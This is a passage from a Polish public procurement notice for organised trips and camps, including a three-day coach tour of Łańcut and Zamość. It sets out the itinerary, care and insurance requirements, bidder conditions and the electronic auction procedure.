wieczornych.7.Opieka: a) organizator wypoczynku jest zobowiązany do zapewnienia właściwej opieki uczestnikom wypoczynku, w szczególności: całodobowej opieki doświadczonej kadry zgodnie z przepisami MEN;b) dostęp do całodobowej opieki lekarskiej i pielęgniarskiej c) opieka ratownicza (wychowawca-ratownik z uprawnieniami i doświadczeniem)d) opieka rezydenta e) pokoje wychowawców i dzieci muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników obozu na sąsiadujących kondygnacjach na każdej z nich musi znajdować się pokój wychowawców.8. Transport uczestników wypoczynku powinien zostać zorganizowany z uwzględnieniem wymagań określonych w ustawie z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity Dz.U. 2016 poz. 1907),a) wyjazd na obóz nastąpi 08.07.2017 r. z Legnicy, powrót 18.07.2017 r.do Legnicy.b)Wykonawca zapewni uczestnikom wycieczki transport komfortowym, klimatyzowanym autokarem (nie starszym niż 5 lat), wyposażonym w toaletę, barek i odtwarzacz DVD. c)Wykonawca zapewni uczestnikom wypoczynku transport do ośrodka wypoczynkowego w Lloret de Mar i transport powrotny.d) obsługę min. dwóch kierowców e) Wykonawca zapewni opiekę doświadczonej kadry nad dziećmi w czasie przejazdu, zgodnie przepisami MEN,f) ubezpieczenie autokaru,g) w przypadku awarii autokaru podstawienie autokaru zastępczego nastąpi na koszt Wykonawcy. 9. Ubezpieczenie: uczestnicy wypoczynku muszą mieć zapewnione ubezpieczenie od następstw nieszczęśliwych wypadków i kosztów leczenia zarówno na czas pobytu, jak i czas podróży. Ubezpieczenie obejmuje okres momentu przekazania dzieci pod opiekę wychowawców w miejscu zbiórki do momentu odebrania dzieci przez opiekunów/rodziców po powrocie z wypoczynku. 10. Dodatkowe wymagania:Wykonawca zapewni bilety wstępów do EuroDisneylandu, przewodników oraz opłaty klimatyczne. d) zorganizowanie wycieczki 3 dniowej na Podkarpacie i Roztocze w dniach 07-09.09.2018 r. dla 55 osób. 1. Przewidywana liczba uczestników: 55-oznacza maksymalną liczbę uczestników. Podana przez Zamawiającego liczba jest liczbą przewidywaną. Rzeczywista liczba zgłoszeń, wynikająca z aktualnych potrzeb Zamawiającego, zostanie podana Wykonawcy na 21 dni przed planowanym wyjazdem.2. Miejsce wypoczynku: Łańcut, Zamość, Zwierzyniec, Kolbuszowa.3. Termin wypoczynku: 07-09.09.2018 r. (2 noclegi) czas trwania: 3 dni4.Wyżywienie: 2 śniadanie, 2 obiady, 2 obiadokolacje.5. Zakwaterowanie: 2 noclegi w pok. 2-3 os. z łazienkami w hotelu lub pensjonacie.6.Plan wycieczki: Dzień 1:Godz. 2:00 Wyjazd z Legnickiego PolaGodz. 11:00 Przyjazd do Łańcuta - zwiedzanie Zamku w tym: Zamek ekspozycja główna (bez II piętra), Stajnie i wozownia, Oranżerja, Storczykarnia, Sztuka Cerkiewna. Obiad na trasie.Godz. 15:00 Przejazd na nocleg w okolicy Zamościa,Godz. 18:00 Zakwaterowanie w hotelu/pensjonacie pok. 2 - 3 os. z łazienkami. Obiadokolacja.Dzień 2:Godz. 7:30 ŚniadanieGodz. 8:30 Przejazd do ZwierzyńcaGodz. 9:30 Przyjazd do Zwierzyńca w trakcie krótki przystanek w Szczebrzeszynie- grupowe zdjęcie z pomnikiem słynnego chrząszcza.Zwierzyniec: kościół na wodzie ul. Ordynacji Zamojskiej - Kościół św. Jana Nepomucena, Browar - zwiedzanie i degustacja piwa.Następnie przejazd do Zamościa - Zwiedzanie z przewodnikiem miejscowym - Rynek Wielki, ratusz, kamienice, Muzeum Zamojskie, Akademia Zamojska, pałac Zamoyskich, katedra, bramy miejskie, fragmenty murów obronnych, trasa turystyczna w bastionie. W przerwie zwiedzania obiad. Przejazd do hotelu/pensjonatu, obiadokolacja, nocleg.Dzień 3:Godz. 7:30 ŚniadanieGodz. 8:30 Przejazd w poszukiwaniu "Padkarpackiego" złota. Zapoznanie się z produkcją miodu. Na koniec degustacja miodu.Godz. 11:30 Przejazd do Kolbuszowej. Zwiedzanie Parku Etnograficznego - skansenu. Godz. 14:00 Wyjazd w drogę powrotną do Legnickiego Pola. Po drodze obiad tranzytowy.Zakończenie wycieczki w Legnickim Polu ok. godz. 23:007. Opieka: organizator wypoczynku jest zobowiązany do zapewnienia kompetentnego pilota-przewodnika wycieczek.8. Transport uczestników wypoczynku powinien zostać zorganizowany z uwzględnieniem wymagań określonych w ustawie z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity Dz.U. 2016 poz. 1907).a) wyjazd na wycieczkę oraz powrót nastąpią o godzinach wskazanych w programach przez Wykonawcę.b) Wykonawca zapewni uczestnikom wycieczki transport komfortowym, klimatyzowanym autokarem (nie starszym niż 5 lat), wyposażonym w toaletę i odtwarzacz DVD,c)Wykonawca zapewni ubezpieczenie autokaru,d) w przypadku awarii autokaru podstawienie autokaru zastępczego nastąpi na koszt Wykonawcy.9.Ubezpieczenie: Wykonawca zapewni uczestnikom wypoczynku ubezpieczenie NNW (od następstw nieszczęśliwych wypadków) zarówno na czas pobytu, jak i czas podróży. Ubezpieczenie obejmuje okres momentu rozpoczęcia wycieczki do momentu przyjazdu z wycieczki do Legnicy.10. W ramach usługi Wykonawca zapewni: bilety wstępów do zwiedzanych obiektów: Zamek w Łańcucie, Browar w Zwierzyńcu z degustacją piwa, Muzeum Zamojskie, Trasa Turystyczna w bastionie w Zamościu, Zwiedzanie i degustacja miodu w tradycyjnej pasiece podkarpackiej, Park Etnograficzny w Kolbuszowej, opłaty klimatyczne.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">63511000-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>63500000-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">272170,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-09-09</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-09-09</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Wykonawca musi posiadać wpis do rejestru organizatorów turystyki i pośredników turystycznych oraz figurować w Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych. Ocena spełniania warunku nastąpi na podstawie Oświadczenia Wykonawcy (załącznik nr 2 do Ogłoszenia).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia warunku w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca musi wykazać, że wykonał należycie usługi, polegające na wykonaniu co najmniej:1 kolonii zagranicznej lub 1 obozu zagranicznego,1 kolonii krajowej, 1 wycieczki zagranicznej minimum 8 dniowej, 1 wycieczki krajowej minimum 3 dniowej w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości nie mniejszej niż ceny wycieczek zaoferowanych w ofercie oraz że wykonał je należycie. Ocena spełniania warunku nastąpi na podstawie Oświadczenia Wykonawcy (załącznik nr 2 do Ogłoszenia)oraz na podstawie wypełnionego załącznika nr 6 do Ogłoszenia- Wykaz usług.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Oświadczenie wykonawcy dotyczące przesłanek wykluczenia (załącznik nr 3)</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie-na załączniku nr 6</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.Oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej (na załączniku nr 4), w przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. 2.Wniosek o dopuszczenie Wykonawcy do udziału w licytacji elektronicznej </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">https://licytacje.uzp.gov.pl/index.php</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">http://www.dpslp.nbip.pl/dpslp/</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1. Wykonawcy chcący wziąć udział w przedmiotowej licytacji są zobowiązani do dokonania uprzedniej rejestracji na platformie do prowadzenia licytacji elektronicznych, zwanej dalej platformą, oraz do przesłania swojego LOGIN-u Zamawiającemu, wypełniając informację we wniosku o dopuszczenie do udziału w licytacji elektronicznej. 2. Wniosek o dopuszczenie do udziału w licytacji elektronicznej stanowi załącznik nr 2 do ogłoszenia. 3. Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie. Przed rozpoczęciem korzystania z platformy zaleca się zapoznanie się z Samouczkiem, oraz z wersją demonstracyjną platformy, zamieszczonymi na stronie internetowej, na której będzie prowadzona licytacja elektroniczna. 4. Udział w licytacji elektronicznej wymaga dysponowania komputerem PC z systemem operacyjnym Windows/Linux oraz przeglądarką internetową Internet Explorer 6.0 lub wyższą lub Firefox 2.0 lub wyższą. 5. Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wszystkich wykonawców, którzy spełnią warunki udziału w postępowaniu, określając w zaproszeniu termin związania ofertą wykonawcy (30 dni), który zaoferuje najniższą cenę. </span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9">1.W toku jednoetapowej licytacji elektronicznej Wykonawcy składają oferty w postaci elektronicznej. 2.Wykonawca ma możliwość złożenia postąpienia od otwarcia licytacji do jej zamknięcia. Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny 3. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 4. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców. 5. Bezpośrednio po zamknięciu licytacji elektronicznej Zamawiający poda, pod ustalonym w ogłoszeniu o zamówieniu adresem internetowym, nazwę (firmę) oraz adres Wykonawcy, którego ofertę wybrano. 6. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę netto za całość zamówienia. 7. W trakcie licytacji Wykonawca podaje cenę netto (bez VAT) za wykonanie całości zamówienia określonego w pkt II. Cena wywoławcza: 272170,00 zł (netto). Minimalne postąpienie 50.00 PLN netto (słownie: pięćdziesiąt złotych). System nie przyjmie postąpienia, którego wartość jest mniejsza od określonego minimalnego postąpienia. Zamawiający zastrzega sobie prawo do zmian powyższych parametrów licytacji. O zmianach zostaną poinformowani wszyscy zaproszeni 